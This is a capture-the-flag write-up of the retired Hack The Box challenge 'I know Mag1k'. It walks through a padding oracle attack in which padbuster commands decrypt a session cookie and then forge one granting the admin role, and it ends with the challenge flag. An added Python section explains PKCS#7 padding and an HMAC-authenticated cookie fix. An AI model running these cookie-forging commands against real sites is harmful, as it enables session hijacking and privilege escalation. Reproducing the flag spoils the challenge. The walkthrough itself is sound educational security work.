I know Mag1k
Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.
Challenge info
I know Mag1k [by rkmylo]
Can you get to the profile page of the admin?
The challenge
The website allows us to register an account and to login with our account. Of course the objective is to eventually login into the admin account.

When we login with our newly created account, we go through the following steps:
- POST credentials (username and password) to /login.php. We already have a PHPSESSID cookie.
- Be redirected to profile.php. Notice we receive an additional iknowmag1k cookie.
- GET /profile.php
The iknowmag1k cookie definitely looks interesting. It looks like a URL-encoded string. URL-decoding it results in what looks to be a Base64 encoded string. Decoding this, however, does not return any legible output, so we are probably dealing with some form of encryption.
I had to peek at the forums to find out how exactly I'm supposed to tackle this challenge. It appears we are dealing with a Padding Oracle Attack.
So we use padbuster to try to decrypt the iknowmag1k cookie, which will most probably contain something useful. We pass the script a URL to test against, our PHPSESSID cookie (since this may potentially be used in the encryption scheme), as well as our current iknowmag1k cookie. We then pass the value of this last cookie as the value to attack.
```
$ padbuster http://docker.hackthebox.eu:32982/profile.php "ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D" 8 -cookies "PHPSESSID=u43bpp75h91998f7d1icamg0l5; iknowmag1k=ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D"
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): {"user":"b8498756","role":"user"}
[+] Decrypted value (HEX): 7B2275736572223A226238343938373536222C22726F6C65223A2275736572227D0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F
[+] Decrypted value (Base64): eyJ1c2VyIjoiYjg0OTg3NTYiLCJyb2xlIjoidXNlciJ9Dw8PDw8PDw8PDw8PDw8P
-------------------------------------------------------
```
It looks like this cookie holds the username and role of the logged-in user. So we modify this to hold admin for both the username and the role, and run it through padbuster again so it can produce a new valid cookie for us.
```
$ padbuster http://docker.hackthebox.eu:32982/profile.php "ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D" 8 -cookies "PHPSESSID=u43bpp75h91998f7d1icamg0l5; iknowmag1k=ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D" -plaintext '{"user":"admin","role":"admin"}'
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: LDRCU61StZbYrdIXPROTGIprI45i7IsYMAovrw2IGp8AAAAAAAAAAA%3D%3D
-------------------------------------------------------
```
We then reload profile.php with the iknowmag1k cookie set to this newly generated value.
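To make the cookie structure and the root cause concrete, here is an added Python example (not part of the original write-up or of the challenge's own code). It decodes the two cookie values shown above, strips the PKCS#7 padding from padbuster's decrypted hex, and then shows the shape of a fix: an HMAC-authenticated cookie (hypothetical server code with a constructed key) that is verified with a constant-time comparison and rejected uniformly, so a cookie claiming the admin role is refused before anything is parsed.

```python
import base64
import hashlib
import hmac
import json
from urllib.parse import quote, unquote

# Cookie values and padbuster output copied from the write-up above.
ORIGINAL_COOKIE = "ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D"
FORGED_COOKIE = "LDRCU61StZbYrdIXPROTGIprI45i7IsYMAovrw2IGp8AAAAAAAAAAA%3D%3D"
DECRYPTED_HEX = "7B2275736572223A226238343938373536222C22726F6C65223A2275736572227D0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F"
BLOCK_SIZE = 8  # the block size the write-up passes to padbuster


def cookie_blocks(cookie, block_size=BLOCK_SIZE):
    """URL-decode, then Base64-decode the cookie and count its cipher blocks."""
    raw = base64.b64decode(unquote(cookie), validate=True)
    if len(raw) % block_size:
        raise ValueError(f"{len(raw)} bytes is not a multiple of {block_size}")
    return len(raw) // block_size


def strip_pkcs7(data):
    """Remove PKCS#7 padding: last byte n means n trailing bytes of value n.
    A distinct error on bad padding is exactly what a padding oracle leaks."""
    n = data[-1]
    if n == 0 or len(data) < n or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


# Hardened design (hypothetical server code, constructed key): the cookie is
# authenticated with HMAC, so integrity no longer depends on a padding check.
SERVER_KEY = b"constructed demo key, not the challenge's key"


def make_cookie(user, role, key=SERVER_KEY):
    payload = json.dumps({"user": user, "role": role}, separators=(",", ":")).encode()
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return quote(base64.b64encode(payload + tag).decode(), safe="")


def read_cookie(cookie, key=SERVER_KEY):
    """Return the session dict, or None for any malformed or tampered cookie.
    Every failure path yields the same result, so the response leaks nothing."""
    try:
        raw = base64.b64decode(unquote(cookie), validate=True)
    except ValueError:
        return None
    payload, tag = raw[:-32], raw[-32:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if len(tag) != 32 or not hmac.compare_digest(tag, expected):
        return None
    return json.loads(payload)
```

The original cookie decodes to 7 blocks of 8 bytes and the forged one to 5, matching the block size given to padbuster; a cookie built with any other key than the server's is simply rejected.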
The flag
We are now greeted with the admin’s profile page, containing our flag 🙂
HTB{Padd1NG_Or4cl3z_AR3_WaY_T0o_6en3r0ys_ArenT_tHey???}